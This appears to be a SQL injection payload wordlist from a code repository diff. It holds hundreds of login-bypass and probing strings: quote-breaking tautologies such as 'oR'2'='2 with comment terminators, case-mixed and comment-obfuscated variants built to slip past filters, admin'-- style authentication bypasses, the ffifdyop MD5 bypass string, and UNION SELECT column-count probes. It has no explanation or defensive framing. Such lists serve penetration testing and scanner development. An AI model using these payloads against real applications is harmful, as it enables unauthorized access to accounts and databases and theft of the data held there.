||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
Some files were not shown because too many files have changed in this diff Show More
Loading…
x
Reference in New Issue
Block a user